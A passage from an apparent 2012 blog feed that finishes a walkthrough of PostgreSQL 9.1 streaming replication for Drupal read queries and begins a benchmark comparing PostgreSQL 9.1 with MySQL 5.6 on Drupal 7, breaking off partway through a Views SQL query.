
&lt;li&gt;set up a file-based log-shipping slave&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The first step is to create a user for replication on the master:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo su postgres&lt;/span&gt;
&lt;span class='go'&gt;psql&lt;/span&gt;
&lt;span class='go'&gt;create role repl replication login password &amp;#39;repl&amp;#39;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, the master needs to have continuous archiving enabled. This is achieved by editing the &lt;code&gt;/etc/postgresql/9.1/main/postgresql.conf&lt;/code&gt; file on the master and ensuring the following parameters are set:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;wal_level&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; hot_standby
&lt;span class='nv'&gt;max_wal_senders&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 3 &lt;span class='c'&gt;# limits number of concurrent connections from standby&lt;/span&gt;
&lt;span class='nv'&gt;listen_addresses&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;0.0.0.0&amp;#39;&lt;/span&gt;
&lt;span class='nv'&gt;archive_mode&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; on
&lt;span class='nv'&gt;archive_command&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;test ! -f /mnt/postgres/archivedir/%f &amp;amp;&amp;amp; cp %p /mnt/postgres/archivedir/%f&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now to allow remote connections for the replication user, the &lt;code&gt;/etc/postgresql/9.1/main/pg_hba.conf&lt;/code&gt; file on the master server needs to have an entry like (this assumes the slave server I have configured has the IP address 10.39.111.10):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;host  replication   repl 10.39.111.10/32      md5
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the above modifications have been made, we need to restart the PostgreSQL service:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service postgresql restart&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The master is now configured. Next we go to the slave server to take a base backup using &lt;a href='http://www.postgresql.org/docs/9.1/static/app-pgbasebackup.html'&gt;&lt;code&gt;pg_basebackup&lt;/code&gt;&lt;/a&gt; and configure the slave to use this base backup as its data directory:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service postgresql stop&lt;/span&gt;
&lt;span class='go'&gt;sudo mv /var/lib/postgresql/9.1/main/ /var/lib/postgresql/9.1/orig_main&lt;/span&gt;
&lt;span class='go'&gt;sudo su postgres&lt;/span&gt;
&lt;span class='go'&gt;pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h master_server -p 5432 -U repl -W&lt;/span&gt;
&lt;span class='go'&gt;sudo ln -s /etc/ssl/certs/ssl-cert-snakeoil.pem /var/lib/postgresql/9.1/main/server.crt&lt;/span&gt;
&lt;span class='go'&gt;sudo ln -s /etc/ssl/private/ssl-cert-snakeoil.key /var/lib/postgresql/9.1/main/server.key&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;pg_basebackup&lt;/code&gt; command should result in output similar to the following:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$&lt;/span&gt; pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h 10.76.241.129 -p 5432 -U repl -W
&lt;span class='go'&gt;Password: &lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.key&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.crt&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.key&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;WARNING:  skipping special file &amp;quot;./server.crt&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;1403786/1403786 kB (100%), 1/1 tablespace&lt;/span&gt;
&lt;span class='go'&gt;NOTICE:  pg_stop_backup complete, all required WAL segments have been archived&lt;/span&gt;
&lt;span class='gp'&gt;postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we configure the slave to be a hot standby and to allow remote client connections (since Drupal will be connecting to the slave). This is done by editing the &lt;code&gt;/etc/postgresql/9.1/main/postgresql.conf&lt;/code&gt; file on the slave to have the following entries:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;hot_standby&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; on
&lt;span class='nv'&gt;listen_addresses&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;0.0.0.0&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To allow the drupal user to connect from the master server (where &lt;code&gt;apache&lt;/code&gt; is running), modify the &lt;code&gt;/etc/postgresql/9.1/main/pg_hba.conf&lt;/code&gt; file on the slave (assuming 10.76.241.129 is IP address of master):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;host  drupal drupal 10.76.241.129/32      md5
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, create a &lt;code&gt;recovery.conf&lt;/code&gt; file in the PostgreSQL data directory on the slave server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo touch /var/lib/postgresql/9.1/main/recovery.conf&lt;/span&gt;
&lt;span class='go'&gt;sudo chown postgres:postgres /var/lib/postgresql/9.1/main/recovery.conf&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The following should be placed in the &lt;code&gt;recovery.conf&lt;/code&gt; file (assuming 10.76.241.129 is IP address of master):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;standby_mode&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;on&amp;#39;&lt;/span&gt;
&lt;span class='nv'&gt;primary_conninfo&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;host=10.76.241.129 port=5432 user=repl password=repl&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The PostgreSQL service on the slave server is now ready to be started again:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo service postgresql start&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If everything worked correctly, log entries indicating replication is running should be present. For example, on my slave server my log file had entries like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;ubuntu@ip-10-39-111-9:/var/log/postgresql$&lt;/span&gt; sudo tail -n 5 /var/log/postgresql/postgresql-9.1-main.log 
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  streaming replication successfully connected to primary&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  incomplete startup packet&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  redo starts at 1/15000020&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  consistent recovery state reached at 1/16000000&lt;/span&gt;
&lt;span class='go'&gt;2012-07-07 22:06:50 UTC LOG:  database system is ready to accept read only connections&lt;/span&gt;
&lt;span class='gp'&gt;ubuntu@ip-10-39-111-9:/var/log/postgresql$&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
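&lt;p&gt;Apart from the log file, replication status can also be checked from SQL (a quick sketch; the &lt;code&gt;pg_stat_replication&lt;/code&gt; view is available as of 9.1):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- on the master: one row per connected standby
SELECT client_addr, state, sent_location, replay_location
FROM pg_stat_replication;

-- on the slave: returns true while the server is in recovery/standby mode
SELECT pg_is_in_recovery();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;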
&lt;p&gt;Now, Drupal running on the master server is ready to be configured to use a PostgreSQL slave for read-only queries! The &lt;code&gt;settings.php&lt;/code&gt; file for the Drupal site needs to be updated to know about this slave database. My &lt;code&gt;settings.php&lt;/code&gt; file looked like (10.39.111.10 is IP address of slave server):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php5'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;5432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;slave&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;10.39.111.10&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;5432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I would suggest enabling query logging on the slave server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the &lt;code&gt;/etc/postgresql/9.1/main/postgresql.conf&lt;/code&gt; file to have these entries:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;logging_collector = on&lt;/span&gt;
&lt;span class='go'&gt;log_directory = &amp;#39;pg_log&amp;#39;&lt;/span&gt;
&lt;span class='go'&gt;log_statement = &amp;#39;all&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Query log files will then be generated in the &lt;code&gt;/var/lib/postgresql/9.1/main/pg_log&lt;/code&gt; directory.&lt;/p&gt;

&lt;p&gt;By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to the slave server. The search module can be accessed from your Drupal site by going to &lt;code&gt;http://your.ip.address/drupal/?q=search&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the slave server when issuing content searches.&lt;/p&gt;

&lt;p&gt;That&amp;#8217;s about it for this post. Once replication is configured in PostgreSQL, having Drupal send queries to the slave is pretty straightforward.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Comparing PostgreSQL 9.1 vs. MySQL 5.6 using Drupal 7.x</title>
   <link href="http://posulliv.github.com/2012/06/29/mysql-postgres-bench"/>
   <updated>2012-06-29T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/06/29/mysql-postgres-bench</id>
   <content type="html">&lt;p&gt;Its tough to come across much information about running Drupal on PostgreSQL I find beisdes the basics of installing Drupal on PostgreSQL. In particular, I&amp;#8217;m interested in comparisons of running Drupal on PostgreSQL versus MySQL. Previous posts such as this &lt;a href='http://2bits.com/articles/benchmarking-postgresql-vs-mysql-performance-using-drupal-5x.html'&gt;article&lt;/a&gt; from &lt;a href='http://2bits.com/'&gt;2bits&lt;/a&gt; compares performance of MySQL versus PostgreSQL on Drupal 5.x and seems a bit outdated. This &lt;a href='http://groups.drupal.org/node/61793'&gt;post&lt;/a&gt; from the &lt;a href='http://groups.drupal.org/high-performance'&gt;high performance drupal group&lt;/a&gt; is also pretty dated and has some information with similar comparisons.&lt;/p&gt;

&lt;p&gt;In this post, I wanted to run similar tests to what was done in the &lt;a href='http://2bits.com/articles/benchmarking-postgresql-vs-mysql-performance-using-drupal-5x.html'&gt;article&lt;/a&gt; from 2bits but on a more recent version of Drupal - 7.x. I also wanted to test out a few more complex queries that can get generated by the views module and see how they perform in MySQL versus PostgreSQL.&lt;/p&gt;

&lt;p&gt;For this post, I used the latest GA version of PostgreSQL and, for kicks, I went with an alpha release of MySQL - 5.6. I would expect to see similar results for 5.5 in tests like this. I didn&amp;#8217;t use default configurations after installation since I didn&amp;#8217;t see much benefit in testing that. The configurations I used for both systems are documented below.&lt;/p&gt;

&lt;h1 id='environment_setup'&gt;Environment Setup&lt;/h1&gt;

&lt;p&gt;All results were gathered on EC2 instances. The base AMI used for these results is an official AMI of Ubuntu 10.04 provided by Canonical. The particular AMI used as the base image for the results gathered in this post was &lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-0baf7662'&gt;ami-0baf7662&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Images used were all launched in the US-EAST-1A availability zone and were large instance types. After launching this base image I installed MySQL 5.6 and Drupal 7.12. The steps I took to install these components along with the &lt;code&gt;my.cnf&lt;/code&gt; file I used for MySQL are outlined in this &lt;a href='https://gist.github.com/2691521'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The PostgreSQL 9.1 setup I performed on a separate instance along with the &lt;code&gt;postgresql.conf&lt;/code&gt; settings I used are outlined in this &lt;a href='https://gist.github.com/3012400'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;APC was installed and its default configuration was used on both servers.&lt;/p&gt;

&lt;h2 id='data_generation'&gt;Data Generation&lt;/h2&gt;

&lt;p&gt;I used &lt;a href='http://drupal.org/project/drush'&gt;drush&lt;/a&gt; and the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; module to generate data. I generated the following data:&lt;/p&gt;
&lt;table&gt;
  &lt;tr&gt;
    &lt;td&gt;users&lt;/td&gt;&lt;td&gt;50000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;tags&lt;/td&gt;&lt;td&gt;1000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;vocabularies&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menus&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;nodes&lt;/td&gt;&lt;td&gt;100000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;max comments per node&lt;/td&gt;&lt;td&gt;10&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;I generated this data in the MySQL installation first. The data was then migrated to the PostgreSQL instance using the &lt;a href='http://drupal.org/project/dbtng_migrator'&gt;dbtng_migrator&lt;/a&gt; module. This ensures the same data is used for all tests against MySQL and PostgreSQL. I covered how to perform this migration in a previous &lt;a href='http://posulliv.github.com/drupal/2012/06/26/migrate-mysql-postgres/'&gt;post&lt;/a&gt;.&lt;/p&gt;
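&lt;p&gt;One quick sanity check after the migration is to compare row counts on the two servers; statements like these run unchanged on both MySQL and PostgreSQL:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;-- row counts should match across both databases after the migration
SELECT COUNT(*) FROM users;
SELECT COUNT(*) FROM node;
SELECT COUNT(*) FROM comment;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;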

&lt;h2 id='pgbouncer'&gt;pgbouncer&lt;/h2&gt;

&lt;p&gt;One additional setup item I performed for PostgreSQL was to install &lt;a href='http://pgfoundry.org/projects/pgbouncer'&gt;pgbouncer&lt;/a&gt; and configure Drupal to connect through &lt;code&gt;pgbouncer&lt;/code&gt; instead of directly to PostgreSQL.&lt;/p&gt;

&lt;p&gt;Installation and configuration on Ubuntu 10.04 is straightforward. The steps to install &lt;code&gt;pgbouncer&lt;/code&gt; and the configuration I used are outlined in this &lt;a href='https://gist.github.com/3013089'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The main reason for this change is that the ApacheBench-based test unfairly favors MySQL due to PostgreSQL&amp;#8217;s process model. With MySQL, each connection results in a new thread being spawned, whereas with PostgreSQL, each new connection results in a new process being forked. The overhead of forking a new process is much larger than that of spawning a new thread. I did collect numbers for PostgreSQL without using &lt;code&gt;pgbouncer&lt;/code&gt; and I report them in the ApacheBench test section below.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;pgbouncer&lt;/code&gt; maintains a connection pool that Drupal connects to, so in the &lt;code&gt;settings.php&lt;/code&gt; file for my Drupal PostgreSQL instance, I modified my database settings to be:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;6432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I performed this configuration step after I generated data in MySQL and migrated it to PostgreSQL.&lt;/p&gt;

&lt;h1 id='anonymous_users_testing_with_apachebench'&gt;Anonymous Users Testing with ApacheBench&lt;/h1&gt;

&lt;p&gt;First, loading the front page for each Drupal site with the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; module enabled and reporting on query execution times, the following was reported:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;Query Exec Times&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;Executed 65 queries in 31.69 ms&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (with pgbouncer)&lt;/td&gt;
    &lt;td&gt;Executed 66 queries in 49.84 ms&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;
    &lt;td&gt;Executed 66 queries in 95 ms&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;Straight out of the gate, we can see there is not much difference here. 31 versus 50 ms is not going to be felt by many end users. If &lt;code&gt;pgbouncer&lt;/code&gt; is not used, though, query execution time is 3 times slower.&lt;/p&gt;

&lt;p&gt;Next, I went to do some simple benchmarks using ApacheBench. The command used to run &lt;code&gt;ab&lt;/code&gt; was (the number of concurrent connections, X, was the only parameter varied):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;ab -c X -n 100 http://drupal.url.com/ 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;ab&lt;/code&gt; command was always run from a separate EC2 instance in the same availability zone, never on the instance on which Drupal was running.&lt;/p&gt;

&lt;p&gt;Results obtained with default Drupal configuration (page cache disabled) but all other caching enabled are shown in the figure below. The raw numbers are presented in the table after the figure.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/first_anon_res.png' alt='First results.' /&gt;
&lt;/div&gt;&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;c = 1&lt;/th&gt;&lt;th&gt;c = 5&lt;/th&gt;&lt;th&gt;c = 10&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;11.71&lt;/td&gt;&lt;td&gt;16.53&lt;/td&gt;&lt;td&gt;16.28&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (using pgbouncer)&lt;/td&gt;&lt;td&gt;8.44&lt;/td&gt;&lt;td&gt;11.03&lt;/td&gt;&lt;td&gt;11.10&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;&lt;td&gt;4.81&lt;/td&gt;&lt;td&gt;7.32&lt;/td&gt;&lt;td&gt;7.22&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The next test was run after all caches were cleared using &lt;code&gt;drush&lt;/code&gt;. The command issued was:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;drush cc
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Option 1 was then chosen to clear all caches. This was done before each &lt;code&gt;ab&lt;/code&gt; command was run. Results are shown in the figure with raw numbers presented in the table after the figure.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/second_anon_res.png' alt='Second results.' /&gt;
&lt;/div&gt;&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;c = 1&lt;/th&gt;&lt;th&gt;c = 5&lt;/th&gt;&lt;th&gt;c = 10&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;10.50&lt;/td&gt;&lt;td&gt;14.08&lt;/td&gt;&lt;td&gt;6.28&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (using pgbouncer)&lt;/td&gt;&lt;td&gt;7.92&lt;/td&gt;&lt;td&gt;9.23&lt;/td&gt;&lt;td&gt;7.32&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;&lt;td&gt;5&lt;/td&gt;&lt;td&gt;7.04&lt;/td&gt;&lt;td&gt;6.79&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;Finally, the same test was run with Drupal&amp;#8217;s page cache enabled. Results are shown in the figure below with raw numbers presented in the table after the figure.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/third_anon_res.png' alt='Third results.' /&gt;
&lt;/div&gt;&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;c = 1&lt;/th&gt;&lt;th&gt;c = 5&lt;/th&gt;&lt;th&gt;c = 10&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;144&lt;/td&gt;&lt;td&gt;282&lt;/td&gt;&lt;td&gt;267&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (using pgbouncer)&lt;/td&gt;&lt;td&gt;120&lt;/td&gt;&lt;td&gt;205&lt;/td&gt;&lt;td&gt;202&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;&lt;td&gt;35&lt;/td&gt;&lt;td&gt;45&lt;/td&gt;&lt;td&gt;46&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;h1 id='views_queries'&gt;Views Queries&lt;/h1&gt;

&lt;p&gt;The &lt;a href='http://drupal.org/project/views/'&gt;views&lt;/a&gt; module is known to sometimes generate queries that can cause performance problems for MySQL.&lt;/p&gt;

&lt;h2 id='image_gallery_view'&gt;Image Gallery View&lt;/h2&gt;

&lt;p&gt;The first SQL query I want to look at is generated by one of the sample templates that come with the Views module. If you click &amp;#8216;Add view from template&amp;#8217; in the Views module, by default you will only have one template to choose from - the Image Gallery template. After creating a view from this template and not modifying anything about it, I see two problematic queries being generated.&lt;/p&gt;

&lt;p&gt;The first query counts the number of rows in the result set for this view, since this is a paginated view. The second query actually retrieves the results with a LIMIT clause and the appropriate OFFSET depending on what page of the results the user is currently on. For this post, we&amp;#8217;ll just look at the second query, the one that retrieves results. That query is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;tid&lt;/span&gt;      &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index_tid&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
       &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;name&lt;/span&gt; &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data_name&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
       &lt;span class='k'&gt;Count&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;         &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;num_records&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;users&lt;/span&gt; &lt;span class='n'&gt;users_node&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;uid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;users_node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;uid&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt; 
